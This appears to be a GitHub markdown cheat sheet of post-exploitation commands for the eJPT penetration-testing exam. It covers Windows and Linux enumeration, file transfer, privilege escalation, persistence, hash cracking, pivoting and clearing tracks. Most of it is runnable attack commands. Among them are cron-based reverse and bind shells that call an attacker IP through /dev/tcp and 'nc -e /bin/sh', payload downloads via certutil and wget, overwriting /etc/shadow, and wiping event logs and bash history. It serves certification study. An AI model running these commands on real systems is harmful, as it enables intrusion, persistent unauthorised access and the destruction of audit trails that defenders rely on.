Skip to content

Latest commit

 

History

History
622 lines (327 loc) · 10.2 KB

10.Post-Exploitation.md

File metadata and controls

622 lines (327 loc) · 10.2 KB

BPM Circuits

eJPT-CheatSheets
Bartosz Pokrywka

Usefull info and commands for eJPT cert exam

Windows Enumeration

Enumerating System Information

In meterpreter:

> getuid

> sysinfo

In shell:

> hostname

Command to enumerate all usefull info:

> systeminfo

Enumerate HotFixes and different interesting things that systeminfo can't:

> wmic qfe get Caption,Description,HotFixID,InstalledOn

Sometimes there's a file called:

> C:\\Windows\System32\eula.txt

Enumerating Users & Groups

In metasploit-framework:

> getuid

> getprivs

> use enum_logged_on_users

In shell:

> whoami

> whoami /priv

List currently logged on users:

> query user

Identyfiy users on system:

> net users

To learn about particullar user:

> net user <USER>

Enumerate groups on system:

> net localgroup

Identyfiy users of the group:

> net localgroup <GROUP>

Enumerating Network Information

Windows IP Configuration:

> ipconfig

> ipconfig /all

Routing table:

> route print

Other systems on the network

> arp -a

Display open connections, services running:

> netstat -ano

Windows firewall configuration:

> netsh firewall show state

> netsh advfirewall

Enumerating Processes & Services

Meterpreter

Process list:

> ps

Search for process name:

> pgrep <processName>

Migrate to a specified process:

> migrate <processID>

Shell

List of started services:

> net start

Display all services:

> wmic service list brief

List of processes and the respective services:

> tasklist /SVC

List of scheduled tasks:

> schtasks /query /fo LIST /v

Automating Windows Local Enumeration

Meterpreter

> use post/windows/gather/win_privs

> use post/windows/gather/enum_logged_on_users

> use post/windows/gather/checkvm

> use post/windows/gather/enum_applications

> use post/windows/gather/enum_computers

> use post/windows/gather/enum_patches

> use post/windows/gather/enum_shares

JAWS

In shell:

> powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

Linux Enumeration

Enumerating System Information

Meterpreter

> sysinfo

Shell

Current dir:

> pwd

Host name:

> hostname

Distribution:

> cat /etc/issue

Name and release:

> cat /etc/*release

Kernel version:

> uname -r

more info:

> uname -a

Enviroment variables:

> env

Hardware resources:

> lscpu

How much RAM is being consumed:

> free -h

Disk space:

> df -h

Another command:

> lsblk | grep sd

If target system is debian, you can list installed packages:

> dpkg -l

Enumerating Users & Groups

Meterpreter

Get username and group:

> getuid

Shell

Get username:

> whoami

Get group:

> groups <username>

Get other users on the system:

> cat /etc/passwd

Find only user accounts (that you can login into):

> cat /etc/passwd | grep -v /nologin

To add user to a specified group:

> usermod -aG <group> <user>

List currently logged on users:

> w

> who

> last

> lastlog

Enumerating Network Information

Meterpreter

Network config:

> ifconfig

Connection list:

> netstat

Network routes:

> route

ARP:

> arp

Shell

Network config:

> ip a s

Contents of the network file:

> cat /etc/networks

Hostname:

> cat /etc/hostname

Hosts file:

> cat /etc/hosts

Display DNS info:

> cat /etc/resolv.conf

Enumerating Processes & Services

Meterpreter

List of processes:

> ps

Look for PID number of process:

> pgrep <processName>

Migrate to desired process PID

> migrate <PID>

Shell:

List of processes:

> ps aux

> ps aux | grep <processName>

List of processes live view:

> top

List cron jobs

> ls -al /etc/cron*

Show cron file

> cat /etc/cron

Automating Linux Local Enumeration

Metasploit

> use /post/linux/gather/enum_configs

> use /post/linux/gather/enum_network

> use /post/linux/gather/enum_system

> use /post/linux/gather/checkvm

LinEnum & linPEAS

  • LinEnum is a simple bash script that automates common Linux local enumeration checks in addition to indentifying privilege escalation vulnerabilities.

  • GitHub Repo: https://github.com/rebootuser/LinEnum

I like linPEAS more:

Also for Windows! :)

Transfering Files

Setting up the web server:

> python -m SimpleHTTPServer <port>

> python3 -m http.server <port>

Windows

>  certutil -urlcache -f http://<attackerIP>:<port>/file.exe file.exe

Linux

> wget http://<attackerIP>:<port>/file

Upgrading Shells

> cat /etc/shells

> /bin/bash -i

If python is installed:

> python -c 'import pty; pty.spawn("/bin/bash")'

If perl is installed:

> perl -e 'exec "/bin/bash";'

or:

> perl: exec "/bin/bash"

If ruby is installed:

> ruby: exec "/bin/bash"

Windows Privliege Escalation

Meterpreter

> getprivs

Then run the PrivescCheck script.

Linux Privliege Escalation

Weak Permissions

Enumerate files with weak permissions:

> find / -not -type l -perm -o+w

How to replace password in shadow file:

> openssl passwd -1 -salt abc password123

Now copy the hash and paste it to the user that you want to change the password:

> nano/vim /etc/shadow

SUDO Privileges

Find what commands user can run:

> sudo -l

Then find the weaknes according to the binary here:

Persistence

Windows

Via Services

Meterpreter:

> exploit/windows/local/persistence_service

Via RDP

Meterpreter:

> run getgui -e -u <username> -p <password>

Then on the attacker machine:

> xfreerdp /u:<username> /p:<password> /v:<targetIP>

Linux

SSH

Copy the id_rsa file to access the target machine user without typing password.

or:

Cronjobs

> ps -eaf

If cron service is running:

reverse shell:

> echo "*/10 * * * * 0<&196;exec 196<>/dev/tcp/<attackerIP>/<port>; sh <&196 >&196 2>&196

" > cron

or bind shell:

> echo "*/10 * * * * nc <attackerIP> <port> -e /bin/sh" > cron

> crontab -i cron

> crontab -l

Dumping & Cracking Hash

Windows

Use hashdump from meterpreter session, or mimikatz.

In hashcat for NTLM hash use mode 1000.

Hash is a second part of the string, after colon.

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

> echo "31d6cfe0d16ae931b73c59d7e0c089c0" > hash.txt

For dictionary attack:

> hashcat -a 0 -m 1000 hash.txt /path/to/dictionary.txt

Linux

Use hashdump from meterpreter session, or look inside /etc/shadow file.

The number between dollar signs inficates a type of hashing algorythm. For example 6 means it's SHA-512.

The next part is the SALT (also between dolar signs).

Save the hash into the text file:

> echo "$y$j9T$TANXgpk59y8r3jgPbDl/w/$UqiK6yahwqfyqhcegWLa1.z64TyePP5.VQpUnLqI3VD:19023:0:99999:7::"> hash.txt

For dictionary attack:

> hashcat -a 0 -m 1800 hash.txt /path/to/dictionary.txt

Pivoting

In meterpreter session:

> run autoroute -s <subnet, for example 10.0.29.0/20>

Show active routing table:

> run autoroute -p

Put the meterpreter session in the background:

> background

Then use portscan:

> use auxiliary/scanner/portscan/tcp

> set RHOSTS <ipAddressOfPivotedNetwork>

> run

Go back to previous session and forward port:

> portfwd add -l 1234 -p 80 -r <ipAddressOfPivotedNetwork>

Then scan with nmap service on port 1234:

> nmap localhost -sV -p 1234

After that look for any exploit...

Important to set payload to bind:

> set payload windows/meterpreter/bind_tcp

Clearing Your Tracks

  • A good practice is to store all your scripts, exploits and binaries in the C:/Temp directory on Windows and the /tmp directory on Linux

Windows

Use cleanup meterpreter RC file like this:

> resource <nameOfTheFie>

To clean entire event log in Windows use meterpreter command (warning! it deletes entire log!):

> clearev

Linux

Clear your tracks from .bash_history file:

> nano/vim .bash_history

> history -c

To clean whole .bash_history file:

> cat /dev/null > .bash_history